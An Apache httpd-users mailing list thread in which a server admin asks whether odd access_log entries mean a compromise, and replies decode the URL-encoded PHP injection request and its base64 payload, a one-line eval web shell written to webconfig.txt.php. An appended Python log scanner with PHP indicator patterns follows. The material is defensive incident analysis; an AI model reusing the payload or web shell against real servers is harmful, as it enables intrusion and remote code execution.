httpd-users mailing list archives

From Kent Frazier <frazier...@sbcglobal.net>
Subject Re: [users@httpd] am i hacked ?
Date Mon, 06 Feb 2017 20:06:12 GMT
If you have python installed...
The following python script shows some simple commands for decoding (for 
future reference).

import base64
import urllib.parse

# The two access_log lines from the original mail, pasted as-is
# (including the " > " quoting marks and line wraps from the mail client).
test = """
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
 > 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 > HTTP/1.1" 200 90
 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
 > 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
 > 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 > HTTP/1.1" 200 90"""

# Step 1: turn the %XX escapes back into the characters they encode.
print(urllib.parse.unquote(test))

# Step 2: decode the base64 string passed to base64_decode() in the request.
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))
********************************************************
It yields...
python unquote.py
  /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
'->|';file_put_contents($_SERVER['DOCUME
 > 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';
 > HTTP/1.1" 200 90
 > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
 > 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo 
'->|';file_put_contents($_SERVER['DOCUME
 > 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';
 > HTTP/1.1" 200 90
b'<?php eval($_POST[1]);?>'
********************************************************
I also have a program that attempts to get an email address to notify in 
the event of abuse. It yields the following.

python getAbuseEmail.py 91.200.12.33
['noc@lugalink.net']

though it is unlikely you'll get a response ;-)


On 2/6/2017 8:36 AM, Jack Swan wrote:
> I didn't decode it all.  I'll leave the rest up to you, but the %characters are hexadecimal
> characters.  Look up hex charset.
>
> So the first line translates to (I may have missed a char or two...)
>
> GET/?1=@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quotes_runtime();echo
> '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
> '|<-';
>
>
> ----- Original Message -----
> From: bernd.lentes@helmholtz-muenchen.de
> To: users@httpd.apache.org
> Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
> Subject: [users@httpd] am i hacked ?
>
> Hi,
>
> Just now I found two very weird entries in my access_log:
>
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
>
> What upsets me is that these two requests have status code 200, which means they were successful.
> The IP is from Ukraine. Where can I find out what these %characters mean? Does anyone
> understand what happened here? It's Apache 2.2.3 64-bit.
>
> Thanks for any hint.
>
> Bernd
>
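The decoding Kent walks through by hand (percent-decode the request, then base64-decode the string handed to base64_decode()) can be automated over a whole access_log. The script below is an added example for this thread, not Kent's script and not anything shipped with httpd. It parses lines in the layout shown above (it tolerates the extra numeric field that sits between the timestamp and the request in these lines), percent-decodes repeatedly so double-encoded requests are unwrapped too, decodes any base64 tokens it finds, matches the result against a small set of PHP tokens that should never appear in a legitimate query string, and pulls out the file path the request tries to write under DOCUMENT_ROOT so an admin knows what to look for on disk. The first sample line is the request quoted in the thread, re-joined where the mail client wrapped it; the second is a constructed benign request for comparison. All function names, the indicator list and the regexes are the example's own assumptions.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Sample access_log input (the first line is from the thread, re-joined;
# the second line is a constructed benign request for comparison).
SAMPLE_LOG = (
    '91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors'
    '%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20'
    '%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php'
    '%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B'
    ' HTTP/1.1" 200 90\n'
    '192.0.2.10 - - [06/Feb/2017:16:45:01 +0100] 512 "GET /index.html?page=about HTTP/1.1" 200 2048\n'
)

# Apache-style line: ip ident user [time] <optional extra field> "METHOD target PROTO" status
# The optional "(?:\d+ )?" absorbs the extra number present in the thread's LogFormat.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] (?:\d+ )?'
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# PHP tokens that have no business in a query string (assumed indicator list).
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "superglobal_input": re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "file_write": re.compile(r"\bfile_put_contents\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "quotes_runtime": re.compile(r"\bset_magic_quotes_runtime\s*\("),
}

BASE64_TOKEN = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')
DROP_PATH = re.compile(r"\$_SERVER\['DOCUMENT_ROOT'\]\s*\.\s*'([^']+)'")


def url_decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are unwrapped as well."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def extract_base64_payloads(text):
    """Return the printable strings hidden inside base64 tokens found in text."""
    payloads = []
    for token in BASE64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True).decode('utf-8')
        except (binascii.Error, UnicodeDecodeError):
            continue  # not real base64, or not text once decoded
        if decoded and all(ch.isprintable() or ch in '\r\n\t' for ch in decoded):
            payloads.append(decoded)
    return payloads


def analyze_line(line):
    """Return a finding dict for a suspicious log line, or None if it looks clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = url_decode_fully(m.group('target'))
    payloads = extract_base64_payloads(target)
    haystack = '\n'.join([target] + payloads)
    indicators = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    if not indicators:
        return None
    return {
        'ip': m.group('ip'),
        'time': m.group('time'),
        # Recorded for the analyst; a 200 on "/" says the request was answered,
        # not by itself that the query string was ever evaluated.
        'status': int(m.group('status')),
        'decoded_target': target,
        'payloads': payloads,
        'indicators': indicators,
        'dropped_files': DROP_PATH.findall(target),
    }


def scan_log(text):
    """Run analyze_line over every line of a log and keep the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} at {f['time']} (status {f['status']})")
        print("  indicators:", ', '.join(f['indicators']))
        for p in f['payloads']:
            print("  decoded payload:", p)
        for path in f['dropped_files']:
            print("  check DOCUMENT_ROOT for:", path)
```

Run it against a real log with `scan_log(open('/var/log/httpd/access_log').read())`; for the thread's line it reports the five indicators, the decoded payload `<?php eval($_POST[1]);?>` and the path `/webconfig.txt.php`, which is the file to look for under the document root when deciding whether the write actually happened.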

